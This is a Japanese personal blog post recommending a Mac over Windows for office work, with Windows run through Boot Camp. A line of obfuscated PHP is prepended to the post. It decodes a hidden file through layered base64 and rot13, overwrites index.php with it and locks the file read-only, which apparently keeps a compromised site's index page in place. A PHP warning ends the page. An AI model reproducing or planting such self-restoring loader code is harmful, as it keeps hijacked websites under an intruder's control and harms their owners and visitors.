$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Mac,Windows,選択,比較
おもしろき こともなき世を おもしろく  すみなすものは “感動” なりけり

PCを購入するにあたって、つきものなのが、MacにすべきかWindowsにすべきか、という選択があるかと思います。

私は、Apple製品の大ファンなので、できればMacを……という思いは強くありながら、シゴトでは思いっきりWindowsを使わなくてはならないため、この選択はとても迷うところでした。

結論を申しますと、ここ数年(5年以上)、私はMacbookを使っています。

そう。MacでWindowsを使って、ちゃんとシゴトになっているのです。

そのあたりを、今回は書いてみたいと思います。

■WindowsPCへの不満

実は、私はもともとは完全にWindows派でした。

シゴトで最初に覚えたPCがWindowsだったことが決定要因でした。

周知の通り、いわゆるオフィスワークでは今でもWindowsが圧倒的に主流です。

ところが、WindowsPC、とにかくよくオチる(苦笑)

そして、よくフリーズする。

私は、Macを使うまで、PCというのは、基本的にオチるしフリーズするものだと諦め半分で思い込んでおりました。

それでも、ソフトの互換性を考えると、そういう諦めや不満はさておいて、結局はWindows一択だったわけです。

同じような理由でWindowsを選択されている方は、多いのではないでしょうか。

■MacでWindowsを使う、という奇跡の選択

そんな中、もう数えるのもイヤになるほどのWindowsPCの不具合で、またPC購入を考えなくてはならなくなった時、ふとMacの広告が目に入りました。

やっぱりいいなぁ、Mac。持っていることに喜びと感動があるなぁ、そんな思いで、何気なくネットサーフィンしていると、

Bootcampという言葉が、検索結果に表示されたのです。

恥ずかしながら、Bootcampって、軍隊か何かのマッチョ体操か何かだろうか、なんて思ってしまいましたが……、

これが、MacでWindowsを使うという奇跡のような方法だったのです。

実は、そのころには、Office for Macという製品も出ていました。

MacでMicrosoftOfficeが使えるというものです。

「あ、これでいいんじゃん」

と思ったのも束の間、実はこのソフトでは、私の場合、決定的な欠点があったのです。

それは、Excelでマクロがうまく使えない、ということでした。

私はシゴトで、マクロを組んだ簡単なExcelツールを使っていて、これが欠かせないのです。これが、for Windowsでは、ダメだったのです。

なので、最初にBootcampを知った時も、結局そういう問題が残るんだろうな、と思っていました。

■予想をはるかに超えたBootcampの威力

Bootdampは、素晴らしい技術でした。

要するに、Macの領域を二つに分け、一つを完全にWindowsにするというものでした。

for Macではありません。完全に、正真正銘のWindowsなのです。

イメージとしては、Mac、Windows2台のPCが1台に存在するという感じです。

したがって、MacOSからWindowsOSに切り替えるときは、再起動が必要です。

これは少々面倒くさいのですが、それでも十分オツリがくるほどに使えます。

何がそんなに使えるのか?

■感動すらしたMacのパワー

とにかく、Macのパワーは凄まじいものでした。

処理速度が劇的に速い!

そして、涙が出るほどの安定感。

いま使っている最新のMacbookProの前は、MacbookAirを4年ほど使いましたが、この間、フリーズということがほとんどありませんでした。

作業中にオチることも、もちろんない。皆無でした。

Macを一度使うと、もうMac以外は使えない、という話は耳にしていましたが、

なるほどこういうことか、と私は納得することができたのです。

これは、iPhoneとAndroidを比較したときにも思ったことですが、何というのか、Appleの製品は、密度が違うというのか、本当にムダを削ぎ落して、必要なものがぎっしりと詰まっている感じがします。内部に、スカスカした隙間がない感じで、とても有機的なのです。

私がMacで感じた安定感も、まるで生物のような有機的な安定感に近いものでした。

まぁこのような「印象」はさておいても、とにかく、長年にわたってフリーズや処理中のまま固まってしまうなどのストレスが、本当にMacは皆無に等しいのです。

このノンストレスを考えるなら、BootcampでのOS切り替えの手間などは、ぜんぜんといってよいほど、私は気になっていません。

■結論:私なら、Macをイチオシします。

というわけで、あくまでも私の個人的感想ではありますが、

PC購入するにあたっては、Macをオススメする次第です。

もちろん、WindowsPCもいろいろです。ファンもいろいろだと思いますので、

当然のことながら、それを否定するつもりはまったくありません。

単に、自分で、実際にWindowsOSをMacで使ってみて、実にその操作性や安定性、そして何よりも美術工芸品のような美しさ。

開くたびに感動を与えてくれるこの素敵なマシンに、Windowsヘビーユーザーの私も、すっかり惚れ込んでいるということなのです。

MacかWindowsか、で迷っているのなら、私はMacを強くオススメします。


Warning: sizeof(): Parameter must be an array or an object that implements Countable in /home/jbrk/www/kandouryoku/wp-content/plugins/wp-mystat/lib/mystat.class.php on line 1252